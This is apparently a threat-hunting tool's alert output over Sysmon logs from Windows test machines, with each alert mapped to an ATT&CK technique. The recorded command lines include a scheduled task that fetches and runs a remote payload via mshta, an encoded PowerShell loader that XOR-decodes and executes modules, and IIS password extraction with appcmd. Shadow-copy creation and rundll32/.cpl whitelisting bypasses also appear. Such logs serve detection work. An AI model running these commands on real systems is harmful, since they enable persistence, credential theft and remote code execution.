SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16391
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:33:37.063
365ABB72-20B1-5CD8-0000-001064D62400
1844
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5943
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.933
365ABB72-3D6E-5CEB-0000-0010EFADFF00
2276
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABl
AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" ),1,"
1
5
4
1
0
0x8000000000000000
6184
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:48.644
365ABB72-FE70-5CEB-0000-0010385C0C00
2412
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3,"
3
5
4
3
0
0x8000000000000000
4908
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-29 21:33:19.687
747F3D96-661E-5D3F-0000-00107F248700
3164
C:\Windows\System32\mshta.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49827
false
93.184.220.29
80
http
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1,"
1
5
4
1
0
0x8000000000000000
4863
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:17.445
747F3D96-60F5-5D3F-0000-0010D1CF5500
4356
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
C:\Users\IEUser\Downloads\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-60F5-5D3F-0000-0010A7B65500
4996
C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1,"
1
5
4
1
0
0x8000000000000000
1017
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-23 17:26:08.686
365ABB72-D7B0-5CE6-0000-001077C56D00
3388
\\vboxsrv\HTools\msxsl.exe
1.1.0.1
msxsl
Command Line XSLT
Microsoft
msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat
D:\
IEWIN7\IEUser
365ABB72-CE6C-5CE6-0000-002047F30000
0xf347
1
High
SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8
365ABB72-D2D4-5CE6-0000-001047EA6400
2236
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
380456
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
-
2020-09-10 17:48:39.678
747F3D96-66F7-5F5A-0500-00000000F600
388
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
c:\windows\system32\cmd.exe
c:\windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-66F8-5F5A-E703-000000000000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-66F4-5F5A-0300-00000000F600
300
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
1
5
4
1
0
0x8000000000000000
4863
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:17.445
747F3D96-60F5-5D3F-0000-0010D1CF5500
4356
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
C:\Users\IEUser\Downloads\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-60F5-5D3F-0000-0010A7B65500
4996
C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
1
5
4
1
0
0x8000000000000000
4863
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:17.445
747F3D96-60F5-5D3F-0000-0010D1CF5500
4356
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
C:\Users\IEUser\Downloads\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-60F5-5D3F-0000-0010A7B65500
4996
C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16511
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:20:01.964
365ABB72-55C1-5CD8-0000-0010970D2F00
4092
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-502E-5CD8-0000-00102A330700
3192
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1,"
1
5
4
1
0
0x8000000000000000
16390
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:32:58.167
365ABB72-208A-5CD8-0000-0010119B2400
3560
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16390
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:32:58.167
365ABB72-208A-5CD8-0000-0010119B2400
3560
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5940
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.852
365ABB72-3D6E-5CEB-0000-00102FAAFF00
3304
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16390
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:32:58.167
365ABB72-208A-5CD8-0000-0010119B2400
3560
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
839
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-22 04:02:11.287
365ABB72-C9C3-5CE4-0000-00101F422E00
2888
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-C32E-5CE4-0000-00205DF00000
0xf05d
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-C9C1-5CE4-0000-00100B222E00
3156
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1600 CREDAT:275470 /prefetch:2
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1,"
1
5
4
1
0
0x8000000000000000
6182
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:47.456
365ABB72-FE6F-5CEB-0000-0010D33A0C00
3344
C:\Windows\System32\wbem\WMIC.exe
6.1.7600.16385 (win7_rtm.090713-1255)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
365ABB72-FE6F-5CEB-0000-0010F4370C00
3448
C:\Windows\System32\cmd.exe
cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4907
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-29 21:33:19.556
747F3D96-661E-5D3F-0000-00107F248700
3164
C:\Windows\System32\mshta.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49826
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F ),1,"
1
5
4
1
0
0x8000000000000000
4129
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:59.729
365ABB72-1A2B-5CE4-0000-00102F502201
3772
C:\Windows\System32\schtasks.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Manages scheduled tasks
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
10154
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 22:52:27.588
365ABB72-D1AB-5CC8-0000-0010DB1E4400
1372
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-C494-5CC8-0000-0020E4FF0000
0xffe4
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-D0E5-5CC8-0000-0010DADF3E00
2892
C:\Windows\System32\cmd.exe
cmd
",IEWIN7,Microsoft-Windows-Sysmon/Operational
